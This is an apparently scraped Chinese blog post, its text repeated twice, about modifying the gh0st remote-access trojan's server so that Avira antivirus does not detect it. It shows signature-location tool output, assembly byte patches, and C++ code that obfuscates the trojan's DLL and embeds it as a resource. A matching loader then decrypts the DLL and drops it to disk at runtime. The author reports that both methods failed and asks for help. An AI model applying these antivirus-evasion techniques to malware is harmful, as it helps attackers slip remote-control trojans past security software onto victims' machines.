网络安全:gh0st源码免杀小红伞Avira(2)
2013-06-13 14:36
751 查看
gh0st源码免杀小红伞Avira(2)
已知: .dat ServiceDisplayName 配置信息头 0x5c8
******************************反向定位****************************************
文件名:E:\TestTemp\新建文件夹\Bin\server.exe
------------------------------------------------
(*)正在载入文件....
(*)正在生成..........完成!
执行二次处理中....
定位文件中......
[注意] 文件0000260C_00000002出现特征码! 0040400C
(*)正在修正文件....
(*)正在生成..........完成!
*******************************正向定位*************************************
>>复合特征码定位结果<<
文件名:C:\Documents and Settings\Administrator\桌面\Bin\server.exe
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 0000262E_00000002 0040402E
*******************************汇编*************************************
0040400C 0100 ADD DWORD PTR DS:[EAX],EAX
0041BD70 50 PUSH EAX
0041BD71 40 INC EAX
0041BD72 58 POP EAX
0041BD73 C605 0C404000 0>MOV BYTE PTR DS:[40400C],01
MOV BYTE PTR DS:[40402E],00
0041BD7A ^ E9 8D82FEFF JMP server.004026D2
0041BD7F 90 NOP
.dat 和 .dll都已经免杀了,生成的.exe被杀,杀的地方非常奇怪 ,特征码定位到生成的.exe dat链接dll 的位置(两界之外的),就是 .dat文件结束 dll文件pe头开始前面 之间的一段区域不属于dll也不属于dat,弄不明白这区域有何作用?
如图
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" border=0 alt=查看更多精彩图片 src="http://photo20.hexun.com/p/2011/0629/446632/b_293148D8C8450FBB05EC9A1E75074192.jpg">
反向:01
正向:00
改了就能过,但运行不起来,对应的汇编(ADD--ADC)是修改是没有用的
1、 动态恢复
一句话小红伞也能模拟跟踪执行杀掉 : move byte ptr [0040400C],00
2、生成服务端的时候把dll加密后放到exe里,运行的时候解密释放dll
先读取dll,然后加密,然后把加密后的临时文件作为资源放到exe里,这个实现dll加密城临时文件,这个是服务端里释放dll的时候解密代码。
[/b]加密dll [/b]
HANDLE hFile;
hFile = CreateFile( DllPath, GENERIC_READ, 0, NULL, OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL, NULL);
if ( hFile == INVALID_HANDLE_VALUE )
{
return;
}
DWORD dwSizeLow = GetFileSize(hFile, NULL);
DWORD nNumberOfBytesRead = 0;
BYTE *lpData = new BYTE[dwSizeLow];
ReadFile(hFile, lpData, dwSizeLow, &nNumberOfBytesRead, NULL);
for (int i = 0; i <= dwSizeLow; i++)
{
if (i % 5 == 0)
lpData[i] += 0xAB;
}
try
{
DeleteFile(BakPath_dll);
HANDLE hFile1 = CreateFile(BakPath_dll, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwBytesWrite = 0;
WriteFile(hFile1, lpData, dwSizeLow, &dwBytesWrite, NULL);
CloseHandle(hFile1);
CloseHandle( hFile );
delete []lpData;
}
catch (...)
{
}
解密:[/b]
这个是服务端里释放dll的时候解密代码
void DecryptData(DWORD key, BYTE *data, DWORD len)
{
for (DWORD i = 0; i < len; i++)
{
if (i % 5 == 0)
data[i] -= key;
}
}
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes, dwResSize;
hResInfo = FindResource(NULL, lpResID, "BIN");
hRes = LoadResource(NULL, hResInfo);
hFile = CreateFile(lpFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
dwResSize = SizeofResource(NULL, hResInfo);
DecryptData(0xAB, (BYTE *)hRes, dwResSize);
WriteFile(hFile, hRes, dwResSize, &dwBytes, NULL);
CloseHandle(hFile);
FreeResource(hRes);
这两种方法都不行
求大牛指教 ``
我最近在玩和讯微博,很方便,很实用,你也来和我一起玩吧!
去看看我的微博吧!http://t.hexun.com/3006897/default.html
已知: .dat ServiceDisplayName 配置信息头 0x5c8
******************************反向定位****************************************
文件名:E:\TestTemp\新建文件夹\Bin\server.exe
------------------------------------------------
(*)正在载入文件....
(*)正在生成..........完成!
执行二次处理中....
定位文件中......
[注意] 文件0000260C_00000002出现特征码! 0040400C
(*)正在修正文件....
(*)正在生成..........完成!
*******************************正向定位*************************************
>>复合特征码定位结果<<
文件名:C:\Documents and Settings\Administrator\桌面\Bin\server.exe
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 0000262E_00000002 0040402E
*******************************汇编*************************************
0040400C 0100 ADD DWORD PTR DS:[EAX],EAX
0041BD70 50 PUSH EAX
0041BD71 40 INC EAX
0041BD72 58 POP EAX
0041BD73 C605 0C404000 0>MOV BYTE PTR DS:[40400C],01
MOV BYTE PTR DS:[40402E],00
0041BD7A ^ E9 8D82FEFF JMP server.004026D2
0041BD7F 90 NOP
.dat 和 .dll都已经免杀了,生成的.exe被杀,杀的地方非常奇怪 ,特征码定位到生成的.exe dat链接dll 的位置(两界之外的),就是 .dat文件结束 dll文件pe头开始前面 之间的一段区域不属于dll也不属于dat,弄不明白这区域有何作用?
如图
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" border=0 alt=查看更多精彩图片 src="http://photo20.hexun.com/p/2011/0629/446632/b_293148D8C8450FBB05EC9A1E75074192.jpg">
反向:01
正向:00
改了就能过,但运行不起来,对应的汇编(ADD--ADC)是修改是没有用的
1、 动态恢复
一句话小红伞也能模拟跟踪执行杀掉 : move byte ptr [0040400C],00
2、生成服务端的时候把dll加密后放到exe里,运行的时候解密释放dll
先读取dll,然后加密,然后把加密后的临时文件作为资源放到exe里,这个实现dll加密城临时文件,这个是服务端里释放dll的时候解密代码。
[/b]加密dll [/b]
HANDLE hFile;
hFile = CreateFile( DllPath, GENERIC_READ, 0, NULL, OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL, NULL);
if ( hFile == INVALID_HANDLE_VALUE )
{
return;
}
DWORD dwSizeLow = GetFileSize(hFile, NULL);
DWORD nNumberOfBytesRead = 0;
BYTE *lpData = new BYTE[dwSizeLow];
ReadFile(hFile, lpData, dwSizeLow, &nNumberOfBytesRead, NULL);
for (int i = 0; i <= dwSizeLow; i++)
{
if (i % 5 == 0)
lpData[i] += 0xAB;
}
try
{
DeleteFile(BakPath_dll);
HANDLE hFile1 = CreateFile(BakPath_dll, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwBytesWrite = 0;
WriteFile(hFile1, lpData, dwSizeLow, &dwBytesWrite, NULL);
CloseHandle(hFile1);
CloseHandle( hFile );
delete []lpData;
}
catch (...)
{
}
解密:[/b]
这个是服务端里释放dll的时候解密代码
void DecryptData(DWORD key, BYTE *data, DWORD len)
{
for (DWORD i = 0; i < len; i++)
{
if (i % 5 == 0)
data[i] -= key;
}
}
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes, dwResSize;
hResInfo = FindResource(NULL, lpResID, "BIN");
hRes = LoadResource(NULL, hResInfo);
hFile = CreateFile(lpFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
dwResSize = SizeofResource(NULL, hResInfo);
DecryptData(0xAB, (BYTE *)hRes, dwResSize);
WriteFile(hFile, hRes, dwResSize, &dwBytes, NULL);
CloseHandle(hFile);
FreeResource(hRes);
这两种方法都不行
求大牛指教 ``
我最近在玩和讯微博,很方便,很实用,你也来和我一起玩吧!
去看看我的微博吧!http://t.hexun.com/3006897/default.html
相关文章推荐
- 网络安全:gh0st源码免杀小红伞Avira(3)
- 网络安全:gh0st源码免杀小红伞Avira(1)
- 网络安全:gh0st源码免杀Kaspersky
- 网络安全:gh0st源码免杀ESET_NOD32
- 网络安全:源码免杀lcx过nod32,KAV,mcafee,Avira,AVG,Symantec,金山和360
- 网络安全:gh0st源码免杀360全套(3)
- 网络安全:gh0st源码免杀360全套(2)
- 网络安全:gh0st源码免杀360全套(1)
- 网络安全:远控源码免杀方法
- 网络安全:NC源码编译及免杀
- 【经典源码】网络安全--远程控制--Gh0st3.6饭客网络sid版
- Gh0st3.6编译和源码免杀问题
- 源码免杀实战之Gh0st过瑞星2010主动和防火墙
- 小红伞和NOD32基于源码的免杀经验总结
- 网络安全:gh0st最新免杀手记20111023
- 网络安全:gh0st支持win7,windows 2008屏幕(3)
- 小红伞和NOD32基于源码的免杀经验总结
- 网络安全:gh0st支持win7,windows 2008屏幕和键盘记录(2)
- 源码推荐(0724B):网络数据安全--base64 和 MD5 的简单封装,视频播放器封装AVPlayer
- 网络安全:手动清除gh0st远控服务端(2)